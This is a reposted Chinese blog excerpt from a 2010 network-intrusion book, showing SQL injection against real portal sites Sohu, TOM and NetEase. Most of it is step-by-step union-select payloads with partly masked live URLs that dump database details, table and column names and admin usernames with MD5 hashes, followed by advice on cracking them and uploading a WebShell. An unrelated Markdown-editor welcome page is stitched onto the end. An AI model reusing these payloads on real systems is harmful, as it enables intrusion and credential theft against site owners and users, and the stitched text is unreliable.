对搜狐 网易和TOM三大门户网站的SQL注入漏洞检测
分享一下我老師大神的人工智能教程!零基礎(chǔ),通俗易懂!http://blog.csdn.net/jiangjunshow
也歡迎大家轉(zhuǎn)載本篇文章。分享知識,造福人民,實現(xiàn)我們中華民族偉大復(fù)興!
對搜狐、網(wǎng)易和TOM三大門戶網(wǎng)站的SQL注入漏洞檢測
?本文節(jié)選自《大中型網(wǎng)絡(luò)入侵要案直擊與防御》一書
??
?此外,筆者對搜狐及TOM和網(wǎng)易這三大門戶網(wǎng)站作了注入攻擊檢測,發(fā)現(xiàn)同樣存在明顯的注入漏洞,安全性很糟糕。
?1.MySQL注入檢測搜狐門戶網(wǎng)站
?首先,來看看搜狐網(wǎng)站,搜狐網(wǎng)站上的動態(tài)網(wǎng)頁大部分是采用PHP語言編寫的,同樣注入也很多。例如:
?http://app.sh.sohu.com/lo***l/s.php?id=636
?這個網(wǎng)頁是一個歐萊雅廣告頁面,未對提交的數(shù)字參數(shù)進行檢測,可直接利用SQL注入獲得當(dāng)前數(shù)據(jù)版本、庫名、用戶等信息。首先,通過Order by查詢獲得字段數(shù)目為9,然后通過union select查詢可獲得數(shù)據(jù)庫的各種信息(圖241):
?http://app.sh.sohu.com/lo***l/s.php?id=636 and 1=2 union select 1,2,group_concat(user(),0x7C7C,version(),0x7C7C,database()),4,5,6,7,8,9
? ?圖241 搜狐網(wǎng)站SQL注入查詢數(shù)據(jù)庫信息
?可得到當(dāng)前數(shù)據(jù)庫用戶名為admin,數(shù)據(jù)庫服務(wù)器地址為10.10.82.159,數(shù)據(jù)庫版本為Mysql 5.0.27,當(dāng)前數(shù)據(jù)庫名為sohush。
?再進一步檢測,發(fā)現(xiàn)其中存在幾個非常重要的數(shù)據(jù)庫,包括:dvbbs、love008。前者是論壇數(shù)據(jù)庫,后者是2008專題數(shù)據(jù)庫。在論壇數(shù)據(jù)庫中,可猜解出管理員賬號和密碼為:jim、4591b******ee2b5。在love008數(shù)據(jù)庫中猜解出兩個管理員用戶和密碼分別為(圖242):
?admin 21232f297a*****743894a0e4a801fc3
?es 3e4a632cb*****8fc2386fa5f8e4bd76
? ?圖242 猜解出管理員賬號與密碼
?雖然說管理員密碼都是MD5加密的,不過現(xiàn)在網(wǎng)上有20G的彩虹表下載,破解這些普通密碼MD5值并不是太困難的事情。通過后臺登陸,攻擊者可以想方設(shè)法上傳WebShell并進行提權(quán)與進一步滲透入侵操作。
?此外,在搜狐網(wǎng)站中還有非常多的SQL注入點,舉例如下:
?注入點1(圖243):http://card.money.****.com/yh/card_product.php?id=71
?注入點2:http://blog.club.****.com/list_diary_detail.php?artid=43761&db=blog002P4&kindid=3403
?注入點3:http://blog.club.****.com/list_diary.php?db=blog001P3&kindid=529
?注入點4:http://mini***.163.com/2009/0909/wuliangye/article.php?id=13
?注入點5:http://blog.club.****.com/list_diary.php?db=blog001P3&kindid=529
?注入點6:http://people.business.****.com/person/plist.php?userid=2047
?注入點7:http://minisite.it.****.com/minisite/site849/photodetail1.jsp?corpID=849&status=browse&privCode=04&pictureID=57275
?注入點8:http://zj.svip.****.com/news/2010/duanxindasai/item_list.php?category_id=1905
? ?圖243 搜狐注入點查詢數(shù)據(jù)庫信息
?2.MySQL注入檢測TOM門戶網(wǎng)站
?TOM也是國內(nèi)一大門戶網(wǎng)站,在對TOM門戶網(wǎng)站進行檢測的過程中,也發(fā)現(xiàn)了許多嚴重的SQL注入漏洞,而且危害性非常大,直接導(dǎo)致攻擊者登陸后臺上傳木馬獲得WebShell,并進一步控制整個網(wǎng)站服務(wù)器!
?TOM網(wǎng)站的注入點地址為:
?http://qd**.tom.com/blog_content.php?blogid=482
?直接用Order by進行查詢時,會出錯并跳轉(zhuǎn)到網(wǎng)站首頁,可使用--終止符號進行隔斷處理,執(zhí)行如下查詢:
?http://qd**.tom.com/blog_content.php?blogid=482 order by 14--
?返回正常頁面,得到字段數(shù)為14。再執(zhí)行如下查詢(圖244):
?http://qd**.tom.com/blog_content.php?blogid=482 and 1=2 union select 1,2,3,group_concat(user(),0x7C7C,version(),0x7C7C,database()),4,5,6,7,8,9,10,11,12,13,14%20--
? ?圖244 union聯(lián)合查詢獲得數(shù)據(jù)庫相關(guān)信息
?得到當(dāng)前數(shù)據(jù)庫版本、數(shù)據(jù)庫名和用戶。再爆出當(dāng)前數(shù)據(jù)庫中的所有表名,提交如下查詢:
?http://qd**.tom.com/blog_content.php?blogid=482 and 1=2 union select 1,2,3,4,group_concat(table_name),5,6,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--
? ?圖245 查詢到所有表名
?在頁面返回信息中,即可得到所有表名(圖245)。在其中有名為adminuser的表名,表中很可能包含了管理員賬號及密碼,查詢該表中的列名,可提交如下查詢:
?http://qd**.tom.com/blog_content.php?blogid=482 and 1=2 union select 1,2,3,4,group_concat(column_name),5,6,7,8,9,10,11,12,13,14 from information_schema.columns where table_name=(0x61646D696E75736572)--
? ?圖246 返回用戶名及密碼數(shù)據(jù)列
?從頁面返回信息中,可以看到用戶名及密碼列為username和pw(圖246)。現(xiàn)在要爆出用戶名和密碼的數(shù)據(jù)值,提交如下查詢語句:
?http://qd**.tom.com/blog_content.php?blogid=482 and 1=2 union select 1,2,3,4,group_concat(username,0x7C,pw),5,6,7,8,9,10,11,12,13,14 from adminuser--
? ?圖247 獲得管理員賬號密碼信息
?從返回的頁面信息中,可看到管理員用戶名為qdjxlq,密碼為3631137b9b0e47608c4ece9decc9a607(圖247)。密碼是經(jīng)過MD5加密的32密文,破解并不是很困難。得到后臺管理員賬號密碼后,再尋找后臺登陸地址,得到后臺登陸鏈接地址為(圖248):
?http://qd**.tom.com/admin/admin_login.php
? ?圖248 管理員后臺登陸頁面
?登陸后臺獲得WebShell后,就可以進一步入侵控制服務(wù)器并進行滲透攻擊。
?3.MySQL注入檢測網(wǎng)易門戶網(wǎng)站
?在對國內(nèi)其它門戶網(wǎng)站進行檢測時發(fā)現(xiàn),有許多網(wǎng)站也同樣存在著SQL注入漏洞,例如在網(wǎng)易中存在如下注入點鏈接地址:
?http://min****e.163.com/2009/0909/wuliangye/article.php?id=13
?通過order by查詢可得到字段數(shù),再通過提交如下查詢:
?http://min****e.163.com/2009/0909/wuliangye/article.php?id=13%20and%201=2%20union%20select%201,database(),user(),version(),5,6,7,8
?即可得到數(shù)據(jù)庫版本、用戶名和數(shù)據(jù)庫名信息(圖249)。由于數(shù)據(jù)庫為Mysql 4.0版本,因此不能直接爆出數(shù)據(jù)表名,只有靠字典一個個進行猜解,猜解起來比較麻煩。
? ?圖249 網(wǎng)易注入點猜解示例
??
???
書名:大中型網(wǎng)絡(luò)入侵要案直擊與防御
作者:肖遙 編著
?ISBN 978-7-121-11740-4
?出版日期:2010年10月
?定價:79.00元
?開本:16開
?頁碼:624 頁
? ?作者簡介
?肖遙,網(wǎng)名“冰河洗劍”,國內(nèi)著名網(wǎng)絡(luò)安全技術(shù)獨立研究人士。
?曾從事國防軍工設(shè)計,參與過J10A、J11B等戰(zhàn)斗機配套武器研制,獨立開發(fā)出HF25火箭發(fā)射器,參與DF8GA及導(dǎo)彈發(fā)射架等武器設(shè)計。
?潛心鉆研網(wǎng)絡(luò)安全技術(shù)10余年,長期擔(dān)任國內(nèi)多家著名網(wǎng)站的安全顧問,專業(yè)從事網(wǎng)絡(luò)滲透測試與網(wǎng)絡(luò)風(fēng)險評估。
?長年在《黑客X檔案》、《黑客防線》等國內(nèi)安全專業(yè)媒體上與同行分享最新研究成果。出版有《網(wǎng)絡(luò)滲透攻擊與安防修煉》、《網(wǎng)站入侵與腳本安全攻防修煉》、《黑客大曝光》、《黑客攻防大揭秘》等多部安全類暢銷技術(shù)專著。其中,《網(wǎng)站入侵與腳本安全攻防修煉》一書已輸出至中國臺灣等地。
?內(nèi) 容 簡 介
?本書以解析各種網(wǎng)絡(luò)環(huán)境下攻防案例的形式來講解各種網(wǎng)絡(luò)攻擊與防護技術(shù),從“黑客攻擊”與“安全工作者防守”雙向角度來進行介紹。每一章節(jié)的內(nèi)容按照如下脈絡(luò)展開:典型攻防案例再現(xiàn)→案例的簡單分析→黑客攻擊技術(shù)的系統(tǒng)講解→網(wǎng)管安全防護解決方案→入侵手法與防護難點深度分析。全書真實呈現(xiàn)完整的攻擊與防護事件,可讓讀者了解到攻擊者如何選擇攻擊目標(biāo),如何制訂攻擊方案,如何繞過攻擊中碰到的問題,網(wǎng)管通常采用哪些防護手法,安全漏洞在何處,網(wǎng)管又如何追蹤攻擊者,等等,因此對學(xué)習(xí)者和工作者來說都很有吸引力和參考價值。
?本書是網(wǎng)絡(luò)管理員、信息安全管理員、對網(wǎng)絡(luò)安全感興趣的人員必備的參考書,也可供大中院校或培訓(xùn)學(xué)校教師和學(xué)生閱讀和參考。
???????????給我老師的人工智能教程打call!http://blog.csdn.net/jiangjunshow
你好! 這是你第一次使用 **Markdown編輯器** 所展示的歡迎頁。如果你想學(xué)習(xí)如何使用Markdown編輯器, 可以仔細閱讀這篇文章,了解一下Markdown的基本語法知識。新的改變
我們對Markdown編輯器進行了一些功能拓展與語法支持,除了標(biāo)準的Markdown編輯器功能,我們增加了如下幾點新功能,幫助你用它寫博客:
功能快捷鍵
撤銷:Ctrl/Command + Z
重做:Ctrl/Command + Y
加粗:Ctrl/Command + B
斜體:Ctrl/Command + I
標(biāo)題:Ctrl/Command + Shift + H
無序列表:Ctrl/Command + Shift + U
有序列表:Ctrl/Command + Shift + O
檢查列表:Ctrl/Command + Shift + C
插入代碼:Ctrl/Command + Shift + K
插入鏈接:Ctrl/Command + Shift + L
插入圖片:Ctrl/Command + Shift + G
合理的創(chuàng)建標(biāo)題,有助于目錄的生成
直接輸入1次#,并按下space后,將生成1級標(biāo)題。
輸入2次#,并按下space后,將生成2級標(biāo)題。
以此類推,我們支持6級標(biāo)題。有助于使用TOC語法后生成一個完美的目錄。
如何改變文本的樣式
強調(diào)文本 強調(diào)文本
加粗文本 加粗文本
標(biāo)記文本
刪除文本
引用文本
H2O is是液體。
210 運算結(jié)果是 1024.
插入鏈接與圖片
鏈接: link.
圖片:
帶尺寸的圖片:
當(dāng)然,我們?yōu)榱俗層脩舾颖憬?#xff0c;我們增加了圖片拖拽功能。
如何插入一段漂亮的代碼片
去博客設(shè)置頁面,選擇一款你喜歡的代碼片高亮樣式,下面展示同樣高亮的 代碼片.
// An highlighted block var foo = 'bar';生成一個適合你的列表
- 項目
- 項目
- 項目
- 項目
- 計劃任務(wù)
- 完成任務(wù)
創(chuàng)建一個表格
一個簡單的表格是這么創(chuàng)建的:
| 電腦 | $1600 |
| 手機 | $12 |
| 導(dǎo)管 | $1 |
設(shè)定內(nèi)容居中、居左、居右
使用:---------:居中
使用:----------居左
使用----------:居右
| 第一列文本居中 | 第二列文本居右 | 第三列文本居左 |
SmartyPants
SmartyPants將ASCII標(biāo)點字符轉(zhuǎn)換為“智能”印刷標(biāo)點HTML實體。例如:
| Single backticks | 'Isn't this fun?' | ‘Isn’t this fun?’ |
| Quotes | "Isn't this fun?" | “Isn’t this fun?” |
| Dashes | -- is en-dash, --- is em-dash | – is en-dash, — is em-dash |
創(chuàng)建一個自定義列表
Markdown如何創(chuàng)建一個注腳
一個具有注腳的文本。2
注釋也是必不可少的
Markdown將文本轉(zhuǎn)換為 HTML。
KaTeX數(shù)學(xué)公式
您可以使用渲染LaTeX數(shù)學(xué)表達式 KaTeX:
Gamma公式展示 Γ(n)=(n?1)!?n∈N\Gamma(n) = (n-1)!\quad\forall n\in\mathbb NΓ(n)=(n?1)!?n∈N 是通過歐拉積分
Γ(z)=∫0∞tz?1e?tdt .\Gamma(z) = \int_0^\infty t^{z-1}e^{-t}dt\,. Γ(z)=∫0∞?tz?1e?tdt.
你可以找到更多關(guān)于的信息 LaTeX 數(shù)學(xué)表達式here.
新的甘特圖功能,豐富你的文章
ganttdateFormat YYYY-MM-DDtitle Adding GANTT diagram functionality to mermaidsection 現(xiàn)有任務(wù)已完成 :done, des1, 2014-01-06,2014-01-08進行中 :active, des2, 2014-01-09, 3d計劃一 : des3, after des2, 5d計劃二 : des4, after des3, 5d- 關(guān)于 甘特圖 語法,參考 這兒,
UML 圖表
可以使用UML圖表進行渲染。 Mermaid. 例如下面產(chǎn)生的一個序列圖::
張三李四王五你好!李四, 最近怎么樣?你最近怎么樣,王五?我很好,謝謝!我很好,謝謝!李四想了很長時間,文字太長了不適合放在一行.打量著王五...很好... 王五, 你怎么樣?張三李四王五這將產(chǎn)生一個流程圖。:
鏈接長方形圓圓角長方形菱形- 關(guān)于 Mermaid 語法,參考 這兒,
FLowchart流程圖
我們依舊會支持flowchart的流程圖:
- 關(guān)于 Flowchart流程圖 語法,參考 這兒.
導(dǎo)出與導(dǎo)入
導(dǎo)出
如果你想嘗試使用此編輯器, 你可以在此篇文章任意編輯。當(dāng)你完成了一篇文章的寫作, 在上方工具欄找到 文章導(dǎo)出 ,生成一個.md文件或者.html文件進行本地保存。
導(dǎo)入
如果你想加載一篇你寫過的.md文件或者.html文件,在上方工具欄可以選擇導(dǎo)入功能進行對應(yīng)擴展名的文件導(dǎo)入,
繼續(xù)你的創(chuàng)作。
mermaid語法說明 ??
注腳的解釋 ??
總結(jié)
以上是生活随笔為你收集整理的对搜狐 网易和TOM三大门户网站的SQL注入漏洞检测的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 关于Win10 64位Cadence16
- 下一篇: mysql时间格式秒微秒_mysql 时